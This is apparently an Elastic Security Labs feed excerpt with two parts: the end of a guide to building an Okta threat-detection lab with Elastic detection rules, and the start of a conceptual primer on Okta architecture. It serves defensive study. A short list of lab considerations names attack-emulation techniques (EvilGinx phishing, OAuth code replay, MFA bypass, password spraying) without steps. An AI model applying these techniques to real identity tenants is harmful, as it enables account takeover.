<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image19.png" alt="Fleet agent policies page in Elastic Stack" /></p>
<p><em>Image 4: Fleet agent policies page in Elastic Stack</em></p>
<h2>Setup the Okta integration</h2>
<p>Once our policy is established, we need to install the Okta integration for the Elastic Stack we just deployed.</p>
<p>By selecting the “Okta” name in the agent policies that was just created, we need to add the Okta integration by selecting “Add integration” as shown below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image17.png" alt="The Okta integration within the agent policies" /></p>
<p><em>Image 5: The Okta integration within the agent policies</em></p>
<p>Typing “Okta” into the search bar will show the Okta integration that needs to be added. Select this integration and the following prompt should appear.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image22.png" alt="The Okta Integration page" /></p>
<p><em>Image 6: The Okta Integration page</em></p>
<p>By selecting “Add Okta” we can now begin to set up the integration with a simple step-by-step process, complimentary to adding our first integration in the Elastic Stack.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image7.png" alt="Adding integrations into the Elastic Stack" /></p>
<p><em>Image 7: Adding integrations into the Elastic Stack</em></p>
<h2>Install the Elastic Agent on an endpoint</h2>
<p>As previously mentioned, we have to install at least one agent on an endpoint to access data in Okta, associated with the configured Okta policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP, to keep everything in the same environment. For this publication, I will use a VM instance of <a href="https://releases.ubuntu.com/focal/">Ubuntu 20.04 LTS</a> VM in Google’s Compute Engine (GCE). Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic Agent.</p>
<p>Select the “Install Elastic Agent” button and select which host the agent will be installed on. For this example, we will be using a Linux host. Once selected, a “Copy” option is available to copy and paste the commands into your Linux console, followed by execution.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image24.png" alt="Install Elastic Agent" /></p>
<p><em>Image 8: Install Elastic Agent</em></p>
<h2>Create an Okta token</h2>
<p>At this point, we need an API key and an Okta system logs API URL for the integration setup. Thus, we must pivot to the Okta admin console to create the API token.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image5.png" alt="Access the Okta Admin console" /></p>
<p><em>Image 9: Access the Okta Admin console</em></p>
<p>From the Okta admin console, select the following:</p>
<ol>
<li>Security &gt; API &gt; Tokens</li>
<li>Select the “Create token” button</li>
</ol>
<p>In this instance, we name the API token “elastic”. Since my administrator account creates the token, it inherits the permissions and privileges of my account. In general, we recommend creating a separate user and scoping permissions properly with principle-of-least-privilege (PoLP) for best security practices. I recommend copying the provided API token key to the clipboard, as it is necessary for the Okta integration setup.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image16.png" alt="Copy your API token" /></p>
<p><em>Image 10: Copy your API token</em></p>
<p>We also need to capture the Okta API Logs URL, which is our HTTPS URL with the URI <code>/api/v1/logs</code> or system logs API endpoint.</p>
<p>For example: <code>https://{okta-subdomain}.okta.com/api/v1/logs</code></p>
<p>The Elastic Agent, using the Okta integration, will send requests to this API URL with our API token included in the authorization header of the requests as a Single Sign-On for Web Systems (SSWS) token. With this information, we are ready to finalize our Okta integration setup in the Elastic Stack.</p>
<h2>Add Okta integration requirements</h2>
<p>Pivoting back to the Okta integration setup in the Elastic Stack, it requires us to add the API token and the Okta System logs API URL as shown below. Aside from this, we change the “Initial Interval” from 24 hours to 2 minutes. This will help check for Okta logs immediately after we finish our setup.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image12.png" alt="Configure log collection" /></p>
<p><em>Image 11: Configure log collection</em></p>
<p>Once this information is submitted to the Okta integration setup, we can select the “Confirm incoming data” button to verify that logs are properly being ingested from the Elastic Agent.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image11.png" alt="Preview data from Okta" /></p>
<p><em>Image 12: Preview data from Okta</em></p>
<p>While we have confirmed that data is in fact being ingested from the Elastic Agent, we must also confirm that we have Okta-specific logs being ingested. I would suggest that you take a moment to pivot back to Okta and change some settings in the admin console. This will then generate Okta system logs that will eventually be extracted by our Elastic Agent and ingested into our Elastic Stack. Once completed, we can leverage the Discover feature within Kibana to search for the Okta system logs that should have been generated.</p>
<p>The following query can help us accomplish this - <code>event.dataset:okta*</code></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image13.png" alt="Use Discover to explore your Okta data" /></p>
<p><em>Image 13: Use Discover to explore your Okta data</em></p>
<p>If you have managed to find Okta logs from this, then congratulations rockstar, you have successfully completed these steps:</p>
<ol>
<li>Signed up for Okta Workforce Identity with a trial license</li>
<li>Deployed a trial Elastic stack via cloud.elastic.co</li>
<li>Deployed an agent to your host of choice</li>
<li>Created an Okta policy</li>
<li>Setup the Okta integration</li>
<li>Created an Okta API token</li>
<li>Confirmed incoming data from our Elastic agent</li>
</ol>
<h2>Enable Okta detection rules</h2>
<p>Elastic has 1000+ pre-built detection rules not only for Windows, Linux, and macOS endpoints, but also for several integrations, including Okta. You can view our current existing Okta <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta">rules</a> and corresponding MITRE ATT&amp;CK <a href="https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-oktaWILDCARD.json&amp;leave_site_dialog=false&amp;tabs=false">coverage</a>.</p>
<p>To enable Okta rules, complete the following in the Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Load Elastic prebuilt rules and timeline templates”</li>
<li>Once all rules are loaded:
a. Select “Tags” dropdown
b. Search “Okta”
c. Select all rules &gt; Build actions dropdown &gt; Enable</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image15.png" alt="Searching for Out-of-the-Box (OOB) Okta Detection Rules" /></p>
<p><em>Image 14: Searching for Out-of-the-Box (OOB) Okta Detection Rules</em></p>
<p>While we won’t go in-depth about exploring all rule information, we recommend <a href="https://www.elastic.co/es/guide/en/security/current/detection-engine-overview.html">doing so</a>. Elastic has additional information, such as related integrations, investigation guides, and much more! Also, you can add to our community by <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html">creating your own</a> detection rule with the “Create new rule” button and <a href="https://github.com/elastic/detection-rules#how-to-contribute">contribute</a> it to our detection rules repository.</p>
<h2>Let’s trigger a pre-built rule</h2>
<p>After all Okta rules have been enabled, we can now move on to testing alerts for these rules with some simple emulation.</p>
<p>For this example, let’s use the <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml">Attempt to Reset MFA Factors for an Okta User Account</a> detection rule that comes fresh out-of-the-box (OOB) with prebuilt detection rules.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image15.png" alt="Enabling an OOB Okta detection rule to test alerting" /></p>
<p><em>Image 15: Enabling an OOB Okta detection rule to test alerting</em></p>
<p>To trigger, we simply log into our Okta admin console and select a user of choice from Directory &gt; People and then More Actions &gt; Reset Multifactor &gt; Reset All.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image18.png" alt="Resetting MFA for a user in Okta" /></p>
<p><em>Image 16: Resetting MFA for a user in Okta</em></p>
<p>Once complete, logs will be ingested shortly into the Elastic Stack, and the Detection Engine will run the rule’s query against datastreams whose patterns match <code>logs-okta*</code>. If all goes as expected, an alert should be available via the Security &gt; Alerts page in the Elastic stack.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image1.png" alt="Alert page flyout for triggered OOB Okta detection rule" /></p>
<p><em>Image 17: Alert page flyout for triggered OOB Okta detection rule</em></p>
<h2>Let’s trigger a custom rule</h2>
<p>It is expected that not all OOTB Okta rules may be right for your environment or detection lab. As a result, you may want to create custom detection rules for data from the Okta integration.  Allow me to demonstrate how you would do this.</p>
<p>Let’s assume we have a use case where we want to identify when a unique user ID (Okta Actor ID) has an established session from two separate devices, indicating a potential web session hijack.</p>
<p>For this, we will rely on Elastic’s piped query language, <a href="https://www.elastic.co/es/blog/getting-started-elasticsearch-query-language">ES|QL</a>. We can start by navigating to Security &gt; Detection Rules (SIEM) &gt; Create new rules. We can then select ES|QL as the rule type.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image2.png" alt="Create new rule Kibana page in Elastic security solution" /></p>
<p><em>Image 18: Create new rule Kibana page in Elastic security solution</em></p>
<p>To re-create Okta system logs for this event, we would log in to Okta with the same account from multiple devices relatively quickly. For replication, I have done so via macOS and Windows endpoints, as well as my mobile phone, for variety.</p>
<p>The following custom ES|QL query would identify this activity, which we can confirm via Discover in the Elastic Stack before adding it to our new rule.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image6.png" alt="Testing ES|QL query in Elastic Discover prior to rule implementation" /></p>
<p><em>Image 19: Testing ES|QL query in Elastic Discover prior to rule implementation</em></p>
<p>Now that we have adjusted and tested our query and are happy with the results, we can set it as the query for our new rule.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image21.png" alt="Creating new custom detection rule with ES|QL query logic" /></p>
<p><em>Image 20: Creating new custom detection rule with ES|QL query logic</em></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image8.png" alt="Enabled custom detection rule with ES|QL query for Okta threat" /></p>
<p><em>Image 21: Enabled custom detection rule with ES|QL query for Okta threat</em></p>
<p>Now that our rule has been created, tested, and enabled, let’s attempt to fire an alert by replicating this activity. For this, we simply log into our Okta admin console from the same device with multiple user accounts.</p>
<p>As we can see, we now have an alert for this custom rule!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image4.png" alt="Triggered alert for events matching custom detection rule" /></p>
<p><em>Image 22: Triggered alert for events matching custom detection rule</em></p>
<h2>Bonus: synchronize Active Directory (AD)</h2>
<p>As discussed in our <a href="https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta">previous Okta installation</a>, a core service offering in Okta is to synchronize with third-party IAM directory services such as AD, Google Workspace, and others. Doing so in your lab can enable further threat detection capabilities as cross-correlation between Windows logs and Okta for users would be possible. For this article, we will step through synchronizing with AD on a local Windows Server. Note - We recommend deploying a Windows Elastic Agent to your Windows Server and setting up the <a href="https://docs.elastic.co/en/integrations/windows">Windows</a> and <a href="https://www.elastic.co/es/guide/en/security/current/install-endpoint.html">Elastic Defend</a> integrations for additional log ingestion.</p>
<ol>
<li><a href="https://www.linkedin.com/pulse/how-install-active-directory-domain-services-windows-server-2019-/">Setup</a> your Windows Server (we are using WinServer 2019)</li>
<li>Deploy the Okta AD agent from your Okta admin console
a. Directory &gt; Directory Integrations
b. Add Directory &gt; Add Active Directory</li>
<li>Walk through guided steps to install Okta AD agent on Windows Server
a. Execution of the Okta Agent executable will require a setup on the Windows Server side as well</li>
<li>Confirm Okta AD agent was successfully deployed</li>
<li>Synchronize AD with Okta
a. Directory &gt; Directory Integrations
b. Select new AD integration
c. elect “Import Now”
Choose incremental or full import</li>
<li>Select which users and groups to import and import them</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image10.png" alt="Successful Okta agent deployment and synchronization with AD" /></p>
<p><em>Image 23: Successful Okta agent deployment and synchronization with AD</em></p>
<p>Once finished, under Directory in the Okta admin console, you should see people and groups that have been successfully imported. From here, you can emulate attack scenarios such as stolen login credentials locally (Windows host) being used to reset MFA in Okta.</p>
<h2>Additional considerations</h2>
<p>While this is a basic setup of not only the Elastic Stack, Okta integration, and more for a threat research lab, there are additional considerations for our setup that are dependent on our research goals. While we won't dive into specifics nor exhaust possible scenarios, below is a list of considerations for your lab to accurately emulate an enterprise environment and/or adversary playbooks:</p>
<ul>
<li>Is Okta my IdP source of truth? If not, set up a third party such as Azure AD (AAD) or Google Workspace and synchronize directory services.</li>
<li>Will I simulate adversary behavior - for example, SAMLjacking? If so, what third-party integrations do I need that leverage SAML for authentication?</li>
<li>Do I want to research tenant poisoning? If so, should I set up a multi-tenant architecture with Okta?</li>
<li>Do I need separate software, such as VPNs or proxies, to emulate attribution evasion when attempting to bypass MFA?</li>
<li>What other tools, such as EvilGinx, let me attempt phishing playbooks, and what is the required set up in Okta for these exercises?</li>
<li>How should I capture authorization codes during OAuth workflows, and how can I replay an exchange request for an access token?</li>
<li>For password spraying or credential stuffing, which third-party applications should I integrate, and how many should suffice for accurate detection logic?</li>
<li>How might I explore lax access policies for user profiles?</li>
</ul>
<h2>Takeaways</h2>
<p>In this guide, we've successfully navigated the setup of an Okta threat detection lab using the Elastic Stack, highlighting the importance of safeguarding SaaS platforms like Okta. Our journey included deploying the Elastic Stack, integrating and testing Okta system logs, and implementing both pre-built and custom detection rules.</p>
<p>The key takeaway is the Elastic Stack's versatility in threat detection, accommodating various scenarios, and enhancing cybersecurity capabilities. This walkthrough demonstrates that effective threat management in Okta environments is both achievable and essential.</p>
<p>As we wrap up, remember that the true value of this exercise lies in its practical application. By establishing your own detection lab, you're not only reinforcing your security posture but also contributing to the broader cybersecurity community. Stay tuned for additional threat research content surrounding SaaS and Okta, where we'll explore common adversary attacks against Okta environments and detection strategies.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/photo-edited-03.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Starter guide to understanding Okta]]></title>
            <link>https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta</link>
            <guid>starter-guide-to-understanding-okta</guid>
            <pubDate>Tue, 23 Jan 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>The evolution of digital authentication from simple, unencrypted credentials to today’s advanced methods underscores the importance of data security. As organizations adapt to hybrid deployments and integral application access is no longer within the perimeter of a network, inherited authentication complexity and risk ensue. The adoption of standard authentication protocols and advanced workflows is mandatory to not only reduce risk but also maintain operational stability amongst users who require access to various applications. Okta provides solutions to these inherent industry problems with its comprehensive SaaS platform for Identity and Access Management (IAM) services.</p>
<p>We will examine Okta's services and solutions in the context of Software-as-a-Service (SaaS) platforms and against the backdrop of the broader threat landscape. We'll explore historical and potential vulnerabilities to understand their origins and impacts. This article will provide insights into:</p>
<ul>
<li>Universal Directory (UD)</li>
<li>Data Model</li>
<li>API Access Management</li>
<li>Access Policies</li>
<li>Session Management</li>
<li>Tenants</li>
<li>Authorization Workflows</li>
<li>Authentication Workflows.</li>
</ul>
<p>With a deeper understanding of Okta, security practitioners may leverage this knowledge to accurately assess attack surfaces where Okta is deployed.</p>
<h1>Okta's offerings</h1>
<h2>Overview of core services</h2>
<p>In this introduction, we delve into the core services provided by Okta. Primarily, Okta is a SaaS platform, specializing in scalable Identity and Access Management (IAM) solutions. Central to its offerings are technologies such as Single Sign-On (SSO), Multi-Factor Authentication (MFA), and support for complex multi-tenant architectures. Okta also boasts a robust suite of RESTful APIs, facilitating seamless Create, Read, Update, and Delete (CRUD) operations.</p>
<p>At the heart of Okta’s IAM solutions lie users, groups, and policies. The platform provides comprehensive lifecycle management and a UD, allowing seamless IAM across hybrid environments encompassing applications, devices, and more. This includes synchronization capabilities with external directories like LDAP or Active Directory (AD), ensuring a unified identity management system.</p>
<p>A key aspect of Okta's service is its dual role as both a Service Provider (SP) and an Identity Provider (IdP). This dual functionality enables Okta to facilitate secure and seamless authentication via its <a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-index.htm">Identity Engine</a>, and robust authorization using standard protocols such as OAuth, while also supporting authentication protocols such as Security Assertion Markup Language (SAML) and OpenID Connect (OIDC).</p>
<p>For customers, Okta offers valuable tools for security and compliance. <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/">System logs</a>, environment-based events that are stored and retrievable via API, provide insights into user activities and organizational events. These logs are crucial for Security Information and Event Management (SIEM) systems, aiding in the detection of anomalies and potential threats.</p>
<p>Additionally, Okta's <a href="https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm">ThreatInsight</a> feature stands out as a proactive security measure. It aggregates and analyzes system logs, dynamically identifying and responding to potential threats. This includes recognizing patterns indicative of malicious activities such as password spraying, credential stuffing, and detecting suspicious IP addresses. These features collectively enhance the security posture of organizations, fortifying them against a wide array of cyber threats.</p>
<h2>Integration capabilities</h2>
<p>Aside from some of the many offerings, Okta is very developer-friendly with various other SaaS solutions and applications. Out of the box, Okta contains an <a href="https://www.okta.com/integrations/">integration network</a> that allows seamless integration with other applications such as Slack, Google Workspace, Office 365, GitHub, and many more.</p>
<p>Okta’s <a href="https://developer.okta.com/docs/reference/core-okta-api/">RESTful APIs</a> follow the System for Cross-domain Identity Management (<a href="https://datatracker.ietf.org/doc/html/rfc7644">SCIM</a>) protocol. This allows for straightforward Create, Read, Update, and Delete (CRUD) operations on users and groups by applications or developers, but also enables standardization within the SaaS ecosystem. SCIM is a pivotal component of Okta's scalability. As businesses expand, the need to integrate an increasing number of users, groups, and access controls across various SaaS platforms grows. SCIM addresses this challenge by standardizing how user identity data is communicated between these platforms. This standardization facilitates the process of user management, especially in synchronizing user information across different systems.</p>
<p>Okta’s object management regarding APIs is focused on several domains listed below:</p>
<ul>
<li>Apps API - Manage applications and their association with users and groups.</li>
<li>Users API - CRUD operations on users.</li>
<li>Sessions API - Creates and manages user’s authentication sessions.</li>
<li>Policy API - Creates and manages settings such as a user’s session lifetime.</li>
<li>Factors API - Enroll, manage, and verify factors for MFA.</li>
<li>Devices API - Manage device identity and lifecycles.</li>
</ul>
<p>When integrations are added to an Okta organization, authentication policies, both fine-grained and global, can be set up for access control based on end-user attributes stored within the user’s Okta profile.</p>
<h1>Universal directory</h1>
<p>At the core of Okta’s user, group, policy, and device management is the <a href="https://www.okta.com/products/universal-directory">UD</a>. This is a single pane view of all assets, whether sourced from Okta, an integration, or a secondary directory service such as AD.</p>
<p>The UD is technically an Okta-managed, centralized, and cloud-based repository for all user, group, device, and policy profiles. Okta is either the source of truth regarding IAM or synchronizes with other federation services and identity providers such as AD or Google Workspace. The UD is accessible behind Okta’s core APIs for CRUD operations and used in conjunction with their single sign-on (SSO) platform, thus providing authentication and authorization to linked integrations or the admin console itself. Everything from user management to streamlined password management is enabled by the UD.</p>
<p>In conclusion, the UD classifies as a directory-as-a-service (<a href="https://jumpcloud.com/daas-glossary/directory-as-a-service-daas">DaaS</a>), similar to AWS directory service, Microsoft’s Entra ID and many more.</p>
<h2>Customization and management</h2>
<p>Adding a bit more depth to the UD, profile customization is accessible. This enables an organization to store a record of information regarding users and groups that contain specific attributes. Base attributes are assigned by Okta, but custom attributes can be added as well between user, group, and app <a href="https://developer.okta.com/docs/concepts/user-profiles/">user profiles</a>. Attribute mappings are important for synchronization and data exchanges between integrations and other directory services. For example, the AD attribute givenName can be mapped specifically to FirstName and LastName in Okta. Aside from synchronization, this is important for other Okta-related features such as <a href="https://developer.okta.com/docs/concepts/inline-hooks/">inline hooks</a>, directory rules and actions, and more.</p>
<p>Additionally, this enables rich SAML assertions and <a href="https://auth0.com/docs/authenticate/protocols/ws-fed-protocol">WS-Federation</a> claims where applications can utilize this information to create rich user accounts, update accounts, or create complex authorization and authentication decisions.</p>
<p>There are additional <a href="https://help.okta.com/en-us/content/topics/provisioning/lcm/con-okta-prov.htm">autonomous provisioning and deprovisioning</a> options available as well with the UD and internal profiles, important for scalability and administrative tasks such as controlling which user types can access which applications, thus enabling more traditional role-based access control (RBAC) policies.</p>
<h2>Integration with external directories</h2>
<p>As mentioned previously, the Okta <a href="https://www.okta.com/resources/whitepaper/ad-architecture/">Directory Integration</a> can synchronize with external directories such as LDAP, AD, Google Workspace and others. For cloud-based DaaS platforms, Okta leverages RESTful APIs and the SCIM protocol to perform data exchanges and more. For on-premise environments, Okta has an AD <a href="https://help.okta.com/en-us/content/topics/directory/ad-agent-new-integration.htm">endpoint agent</a> that can be deployed and thus pulls information from directory services and ships it back to the UD.</p>
<p>Alternatively, Desktop SSO (DSSO) provides an <a href="https://help.okta.com/en-us/content/topics/directory/configuring_agentless_sso.htm">agentless</a> option as well. This supplies flexibility to cloud, on-premise or hybrid based environments all while continuing scalability and direct integration with 3rd-party applications. Architecturally, this solves the many pitfalls of LAN-based environments, where applications are served to domain users behind a firewall. From a security perspective, credentials and profiles are then synchronized from all application directories into a single “source-of-truth”: Okta. It is much more approachable to audit a single directory as well in an instance where, for example, a disgruntled employee is no longer employed, and thus access across various applications must be deactivated. Single Log-Off (<a href="https://help.okta.com/en-us/content/topics/apps/apps_single_logout.htm">SLO</a>) is thus available for such situations thanks to these external directory integration capabilities.</p>
<p>Finally, we must not overlook the amount of maintenance this potentially reduces for organizations who may not have the resources to manage SAML, OAuth, and SCIM communications between RESTful APIs or compatibility issues between integrations as Okta manages this for them.</p>
<p>Additional solutions and examples of Okta providers with external directory support for AD can be found <a href="https://www.okta.com/resources/whitepaper/ad-architecture/">here</a>.</p>
<h1>Data model</h1>
<p>As we traverse through the Okta landscape, understanding Okta’s <a href="https://developer.okta.com/docs/concepts/okta-data-model/">data models</a> is important to security practitioners who may be tasked with threat hunting, detection logic, and more.</p>
<h2>Structure and design</h2>
<p>When Okta is first established for an organization, it inherits its own “space” where applications, directories, user profiles, authentication policies, and more are housed. A top-level directory resource is given as a “base” for your organization where entities can be sourced from Okta or externally (LDAP, AAD, Google Workspace, etc.).</p>
<p>Okta users are higher-privileged users who typically leverage the Okta <a href="https://help.okta.com/en-us/content/topics/dashboard/dashboard.htm">admin console</a> and perform administrative tasks, while end users are those who may rely on Okta for SSO, access to applications and more.</p>
<p>By default, entities in Okta are referred to as resources. Each resource has a combined set of default and custom attributes as discussed before. Links then describe relationships or actions that are acceptable for a resource, such as a deactivation link. This information is then aggregated into a profile which is then accessible from within the UD. Groups are made up of users more as a label to a specific set of users.</p>
<p>Applications hold information about policies for access related to users and groups, as well as how to communicate with each integrated application. Together, the data stored about application access and related users is stored as an <a href="https://support.okta.com/help/s/article/The-Okta-User-Profile-And-Application-User-Profile?language=en_US">AppUser</a> and if mapping is done correctly between directories, enables access for end users.</p>
<p>A policy contains a set of conditions and rules that affect how an organization behaves with applications and users. Policies are all-encompassing in Okta, meaning they are used for making decisions and completing actions such as - what is required for a password reset or how to enroll in MFA. These rules can be expressed using the Okta Expression Language (<a href="https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/">OEL</a>).</p>
<p>Dedicated <a href="https://developer.okta.com/docs/concepts/auth-servers/">authorization servers</a> are used per organization to provide authorization codes and tokens for access to applications by API or resources. Here, authorization and authentication protocols such as OAuth, OIDC, and SAML are vital for workflows. These authorization servers are also responsible for communication with third-party IdPs such as Google Workspace. End users who may seek access to applications are entangled in communication between authorization servers and SPs as codes and tokens are exchanged rapidly to confirm authorization and authentication.</p>
<p>Altogether, this structure and design support scalability, customization, and seamless integration.</p>
<h1>API access management</h1>
<p>API access management is not only important for end users, administrators, and developers but also for integration-to-integration communication. Remember that at the forefront of Okta are its various RESTful <a href="https://developer.okta.com/docs/reference/core-okta-api/#manage-okta-objects">API endpoints</a>.</p>
<p>While we won’t dive deep into the design principles and object management of Okta’s APIs, we will attempt to discuss core concepts that are important for understanding attack surfaces later in this blog series.</p>
<h2>API Security</h2>
<h3>OAuth 2.0 and OIDC implementation</h3>
<p>Understanding the core protocols of <a href="https://auth0.com/docs/authenticate/protocols/oauth">OAuth</a> and <a href="https://auth0.com/docs/authenticate/protocols/openid-connect-protocol">OIDC</a> is key before exploring various authorization and authentication workflows. OAuth, an open standard for delegated authorization in RESTful APIs, operates over HTTPS, enabling secure, delegated access using access tokens instead of credentials. These tokens, cryptographically signed by the Identity Provider (IdP), establish a trust relationship, allowing applications to grant user access. The typical OAuth workflow involves user access requests, user authentication, proof-of-authorization code delivery, and token issuance for API requests. Access tokens are verified with the IdP to determine access scope.</p>
<p>OIDC (<a href="https://developer.okta.com/docs/reference/api/oidc/#endpoints">API endpoints</a>) builds upon OAuth for authentication, introducing identity-focused scopes and an ID token in addition to the access token. This token, a JSON Web Token (<a href="https://developer.okta.com/blog/2020/12/21/beginners-guide-to-jwt">JWT</a>), contains identity information and a signature, crucial for SSO functionality and user authentication. Okta, as a certified OIDC provider, leverages these endpoints, especially when acting as an authorization server for Service Providers (SPs).</p>
<p>Demonstrating Proof-of-Possession (<a href="https://developer.okta.com/docs/guides/dpop/main/#oauth-2-0-dpop-jwt-flow">DPoP</a>) is crucial in this context, enhancing security by preventing misuse of stolen tokens through an application-level mechanism. It involves a public/private key pair where the public key, embedded in a JWT header, is sent to the authorization server. The server binds this public key to the access token, ensuring secure communication primarily between the user’s browser and the IdP or SP.</p>
<p><a href="https://developer.okta.com/docs/guides/tokens/">Tokens</a> and API keys in Okta’s API Access Management play a vital role, acting as digital credentials post-user authentication. They are transmitted securely via HTTPS and have a limited lifespan, contributing to a scalable, stateless architecture.</p>
<p>Lastly, understanding End-to-End Encryption (E2EE) is essential. E2EE ensures that data is encrypted at its origin and decrypted only by the intended recipient, maintaining security and privacy across the ecosystem. This encryption, using asymmetric cryptography, is a default feature within Okta’s APIs, safeguarding data across applications, browsers, IdPs, and SPs.</p>
<h2>RESTful API and CRUD</h2>
<p>Okta's RESTful API adheres to a standardized interface design, ensuring uniformity and predictability across all interactions. This design philosophy facilitates CRUD (Create, Read, Update, Delete) operations, making it intuitive for developers to work with Okta's API. Each <a href="https://developer.okta.com/docs/reference/core-okta-api/">API endpoint</a> corresponds to standard HTTP methods — POST for creation, GET for reading, PUT for updating, and DELETE for removing resources. This alignment with HTTP standards simplifies integration and reduces the learning curve for new developers.</p>
<p>A key feature of Okta providing a RESTful API is its statelessness — each request from client to server must contain all the information needed to understand and complete the request, independent of any previous requests. This approach enhances scalability, as it allows the server to quickly free resources and not retain session information between requests. The stateless nature of the API facilitates easier load balancing and redundancy, essential for maintaining high availability and performance even as demand scales.</p>
<h2>SCIM</h2>
<p>SCIM (System for Cross-domain Identity Management) is an open standard that automates user identity management across various cloud-based applications and services. Integral to Okta's API Access Management, SCIM ensures seamless, secure user data exchange between Okta and external systems. It standardizes identity information, which is essential for organizations using multiple applications, reducing complexity and manual error risks.</p>
<p>Within Okta, SCIM’s role extends to comprehensive user and group management, handling essential attributes like usernames, emails, and group memberships. These are key for access control and authorization. Okta’s SCIM implementation is customizable, accommodating the diverse identity management needs of different systems. This adaptability streamlines identity management processes, making them more automated, efficient, and reliable - crucial for effective API access management.</p>
<p>More information on SCIM can be found in <a href="https://datatracker.ietf.org/doc/html/rfc7644">RFC 7644</a> or by <a href="https://developer.okta.com/docs/concepts/scim/#how-does-scim-work">Okta</a>.</p>
<h2>Access policies</h2>
<p>Okta's <a href="https://developer.okta.com/docs/concepts/policies/">access policies</a> play a critical role in managing access to applications and APIs. They can be customized based on user/group membership, device, location, or time, and can enforce extra authentication steps for sensitive applications. These policies, stored as JSON in Okta, allow for:</p>
<ul>
<li>Creating complex authorization rules.</li>
<li>Specifying additional authentication levels for Okta applications.</li>
<li>Managing user access and modifying access token scopes with inline hooks.</li>
</ul>
<p>Key Policy Types in Okta include:</p>
<ul>
<li><em>Sign-On Policies</em>: Control app access with IF/THEN rules based on context, like IP address.</li>
<li><em>Global Session Policy</em>: Manages access to Okta, including factor challenges and session duration.</li>
<li><em>Authentication Policy</em>: Sets extra authentication requirements for each application.</li>
<li><em>Password Policy</em>: Defines password requirements and recovery operations.</li>
<li><em>Authenticator Enrollment Policy</em>: Governs multifactor authentication method enrollment.</li>
</ul>
<p>Policy effectiveness hinges on their sequential evaluation, applying configurations when specified conditions are met. The evaluation varies between the AuthN and Identity Engine pipelines, with the latter considering both global session and specific authentication policies.</p>
<p>Additionally, <a href="https://help.okta.com/en-us/content/topics/security/network/network-zones.htm">Network Zones</a> in Okta enhances access control by managing it based on user connection sources. These zones, allowing for configurations based on IP addresses and geolocations, integrate with access policies to enforce varied authentication requirements based on network origin. This integration bolsters security and aids in monitoring and threat assessment.</p>
<h1>Session management</h1>
<p>In web-based interactions involving Identity Providers (IdPs) like Okta and Service Providers (SPs), the concept of a session is central to the user experience and security framework. A session is typically initiated when an end-user starts an interaction with an IdP or SP via a web browser, whether this interaction is intentional or inadvertent.</p>
<p>Technically, a session represents a state of interaction between the user and the web service. Unlike a single request-response communication, a session persists over time, maintaining the user's state and context across multiple interactions. This persistence is crucial, as it allows the user to interact with web services without needing to authenticate for each action or request after the initial login.</p>
<p>A session can hold a variety of important data, which is essential for maintaining the state and context of the user's interactions. This includes, but is not limited to:</p>
<p><em>Cookies</em>: These are used to store session identifiers and other user-specific information, allowing the web service to recognize the user across different requests.</p>
<p><em>Tokens</em>: Including access, refresh, and ID tokens, these are critical for authenticating and authorizing the user, and for maintaining the security of their interactions with the web service.</p>
<p><em>User Preferences and Settings</em>: Customizations or preferences set by the user during their interaction.</p>
